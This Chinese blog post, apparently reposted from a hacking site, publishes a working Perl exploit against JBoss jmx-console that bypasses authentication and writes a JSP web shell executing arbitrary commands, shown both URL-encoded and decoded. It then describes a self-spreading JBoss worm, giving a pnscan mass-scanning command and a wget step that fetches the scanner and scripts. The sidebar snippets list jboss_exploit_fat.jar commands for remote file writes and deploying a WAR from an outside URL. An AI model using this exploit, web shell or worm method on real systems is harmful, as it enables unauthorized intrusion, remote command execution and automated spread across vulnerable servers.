jboss HEAD exp

最新推荐文章于 2024-04-22 10:02:04 发布
最新推荐文章于 2024-04-22 10:02:04 发布
阅读量1.4k 收藏
点赞数
分类专栏: 攻防渗透

发一下最近整理的一个小东西吧。JBOSS蠕虫。。。

首先发一个exp

#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 <IP> <Port>\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=xk.war&argType=java.lang.String&arg1=xk&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"; my $exp = new IO::Socket::INET(PeerAddr=>$ip, PeerPort=>$port, TimeOut=>120); print $exp $xkcmd;


解出来是这样的:

#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 <IP> <Port>\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=xk.war&argType=java.lang.String&arg1=xk&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> <FORM METHOD="GET" NAME="comments" ACTION=""> <INPUT TYPE="text" NAME="comment"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML>&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"; my $exp = new IO::Socket::INET(PeerAddr=>$ip, PeerPort=>$port, TimeOut=>120); print $exp $xkcmd;


作用是突破JBoss的登陆验证,上传一个小马  /xk/xk.jsp

下面大家看一下JBoss蠕虫的代码。 原理给大家简单的说一下。首先通过pnscan来扫描使用JBoss的服务器。

./pnscan -r JBoss -w \”HEAD / HTTP/1.0\\r\\n\\r\\n\” -t 6500 $partx.$party.0.0/16 80 > /tmp/xxxxx

然后使用我上面发的这个EXP,传马。然后选择Linux的服务器,通过WGET下载一个压缩包,包里面其实就是pnscan和几个perl的脚本。然后循环下去。。。。

我写这个文章的目的主要是1,方便大家日后再内网渗透的时候遇到JBoss,可以多一个思路。2,大家可以研究一下蠕虫病毒的原理。

文章结束啦,又不是什么新东西,就随便发发,低调。。。顺便说一下,如果这个JSP的小马,不方便的话,可以换成一个JSP的一句话shell,然后再POST一个大马上去。

转载:http://www.myhack58.com/Article/html/3/8/2013/37551.htm

blrk
关注
专栏目录
【信息收集】——3、信息收集指南
Fly_鹏程万里
02-26 4万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 前言 本系列文章只做技术研究与分享,如有恶意利用文章中提及的技术做网络攻击,造成的法律责任,作者概不负责! 安全问题的本质 安全问题的本质是“信...
渗透测试突破口——未授权访问
m0_61506558的博客
10-19 948
本地监听端口 >> 创建Application >> 调用Submit Application API提交。0x04 Elasticsearch未授权访问。默认端口27017直接连接进行增删改查。0x05 Memcache未授权访问。0x08 ActiveMQ未授权访问。0x02 Jenkins未授权访问。0x03 MongoDB未授权访问。0x06 Hadoop未授权访问。0x07 Docker未授权访问。0x09 JBOSS未授权访问。也可以反向shell。
jboss-exp.rar
07-22
某大牛写的jboss-exp 1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
探索JBoss EXP:一款强大的企业级应用服务器
最新发布
gitblog_00021的博客
04-22 335
探索JBoss EXP:一款强大的企业级应用服务器 项目地址:https://gitcode.com/Xyntax/JBoss-exp JBoss EXP 是一个基于Red Hat JBoss EAP(Enterprise Application Platform)的开源项目,旨在提供一个优化和增强的企业级Java应用程序部署平台。通过结合创新的技术和优化的设计,它为开发人员和运维人员提供了一个稳...
jboss xml漏洞exp
07-31
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -ja
JBOSS漏洞
weixin_30488313的博客
04-26 731
  JBOSS:是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。   JBOSS 端口号:8080   默认密码 :admin ...
Jboss中间件两大漏洞分析
fansenliangren的博客
12-28 1559
反序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。
jboss漏洞getshell
weixin_43999372的博客
11-07 1147
前言 最近感觉有点无聊,搞了国外一些站,学到一些知识,主要了解了windos中一些命令. 1.信息收集 首先访问该站,把目录扫描起,然后nmap扫描看看,然后找该站是否存在什么漏洞。然而并没有,扫描目录发现 8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/ 2.漏洞利用 全局...
JBoss4安装配置
Cheers Li 软件测试博客
09-15 824
本文为JBoss4安装配置 因为在安装qcenter的时候要求安装jboss,所以写篇文章和大家分享 1、安装 1.1、安装好j2sdk1.4 1.2、下载jboss-4.0.0.zip。安装方法就是将文件解压到硬盘的c:\jboss4。     2、运行  进入jboss4的bin目录,执行run.bat就可以了。看到出现  INFO  [Server] JBoss (MX MicroKe
JBoss 中间件漏洞
qq_53742230的博客
07-11 1244
JBoss 中间件漏洞复现
JBOOS反序列化漏洞复现
hl1293348082的专栏
03-31 198
2017 年 9 月 14 日,国家信息安全漏洞共享平台( CNVD )收录了 JBOSS Application Server 反序列化命令执行漏洞( CNVD-2017-33724,对应 CVE-2017-12149 ),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。 漏洞细节和验证代码已公开,近期被不法分子利用出现大规模攻击尝试的可能性较大。 0x01. 漏洞复现 1). 环境准备 JBOSS 下载地址:http://download.jboss.org/jbossas/
jboss中间件漏洞复现
mingyqf的博客
02-15 1465
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
一次老版本jboss反序列化漏洞的利用分析
C20220511的博客
09-28 1252
所以我们直接利用ysoserial的Hibernate1利用链是不能成功的,但是仔细对Hibernate1利用链进行分析可以看出漏洞利用过程中的调用栈中并没有涉及到上述不存在的类,上述不存在的类主要用于设置一些类的属性字段,可以通过其他类来代替。这里可以看出jboss中引入的是CommonsCollections2.1的版本,而一般我们平时能利用的版本都是3.x。调试反序列化利用链的代码是一个很麻烦的事情,有兴趣的小伙伴可以把我上面的代码去跟一下,其中主要用到的调用过程如下。
JAVA反序列化exp及使用方法
热门推荐
乐枕的家
12-09 1万+
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波 exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本. 其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包. 更多信息在
java反序列化 exp_JAVA反序列化exp及使用方法
weixin_36038435的博客
02-16 453
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本.其中weblogic和jenkins提供python脚本,但需自己加载payload.而对于jboss和websphere则提供了poc的数据包.更多信息在:foxgl...
Jboss未授权访问部署木马 利用exp
weixin_30216561的博客
04-26 471
查看系统名称 java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 查看系统版本 java -jar jboss_exploit_fat.jar -i http://www.any.c...
jboss漏洞利用
嘻嘻哈哈
01-24 3847
JBOSS简介 1、 概念 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3.0的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 2、优点 JBoss是免费的,开放源代码J2EE的实现,通过LGPL许可证进行发布。 JBoss需要的内存和硬盘空间比较小。 安装非常简单。
jboss 认证绕过漏洞利用的另外一种方式添加用户
cnbird's blog
02-05 3721
curl -I "http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser
JBoss安装配置详解
"JBoss是一个开源的企业级应用服务器,用于运行Java EE应用程序。本文主要介绍了JBoss的安装、配置和管理过程,以及WAR文件的部署方法。" 在JBOSS的安装过程中,首先需要确保已经安装了JDK,因为JBOSS在运行时依赖...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值